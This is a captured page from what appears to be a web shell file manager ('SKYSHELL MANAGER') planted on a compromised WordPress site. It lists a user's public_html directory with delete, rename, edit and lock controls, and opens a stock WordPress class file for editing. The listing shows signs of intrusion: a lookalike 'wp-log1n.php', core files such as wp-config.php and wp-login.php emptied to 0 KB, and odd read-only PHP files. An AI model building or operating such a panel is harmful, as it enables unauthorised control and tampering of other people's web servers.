📁
SKYSHELL MANAGER
PHP v7.4.33
Create
Create
Path:
root
/
home
/
shirleywagnerar0
/
public_html
/
Name
Size
Perm
Actions
📁
image
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
beta2
-
0755
🗑️
🏷️
🔒
📁
beta
-
0755
🗑️
🏷️
🔒
📁
b6d9ba
-
0755
🗑️
🏷️
🔒
📁
old
-
0755
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📄
wp-blog-header.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.42 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-log1n.php
1.93 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
style.php
13.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
networks.php
2.03 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
radio.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
filefuns.php
5.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
about.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
adminfuns.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
classwithtostring.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
click.php
2.03 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.87 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
ex.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
1.47 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
plugins.php
1.72 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
google15987b49ad28d40a.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
item.php
2 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
mah.php
2 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
options.php
0 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
pages.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: class-wp-user-request.php
<?php /** * WP_User_Request class. * * Represents user request data loaded from a WP_Post object. * * @since 4.9.6 */ final class WP_User_Request { /** * Request ID. * * @since 4.9.6 * @var int */ public $ID = 0; /** * User ID. * * @since 4.9.6 * @var int */ public $user_id = 0; /** * User email. * * @since 4.9.6 * @var string */ public $email = ''; /** * Action name. * * @since 4.9.6 * @var string */ public $action_name = ''; /** * Current status. * * @since 4.9.6 * @var string */ public $status = ''; /** * Timestamp this request was created. * * @since 4.9.6 * @var int|null */ public $created_timestamp = null; /** * Timestamp this request was last modified. * * @since 4.9.6 * @var int|null */ public $modified_timestamp = null; /** * Timestamp this request was confirmed. * * @since 4.9.6 * @var int|null */ public $confirmed_timestamp = null; /** * Timestamp this request was completed. * * @since 4.9.6 * @var int|null */ public $completed_timestamp = null; /** * Misc data assigned to this request. * * @since 4.9.6 * @var array */ public $request_data = array(); /** * Key used to confirm this request. * * @since 4.9.6 * @var string */ public $confirm_key = ''; /** * Constructor. * * @since 4.9.6 * * @param WP_Post|object $post Post object. */ public function __construct( $post ) { $this->ID = $post->ID; $this->user_id = $post->post_author; $this->email = $post->post_title; $this->action_name = $post->post_name; $this->status = $post->post_status; $this->created_timestamp = strtotime( $post->post_date_gmt ); $this->modified_timestamp = strtotime( $post->post_modified_gmt ); $this->confirmed_timestamp = (int) get_post_meta( $post->ID, '_wp_user_request_confirmed_timestamp', true ); $this->completed_timestamp = (int) get_post_meta( $post->ID, '_wp_user_request_completed_timestamp', true ); $this->request_data = json_decode( $post->post_content, true ); $this->confirm_key = $post->post_password; } }
Save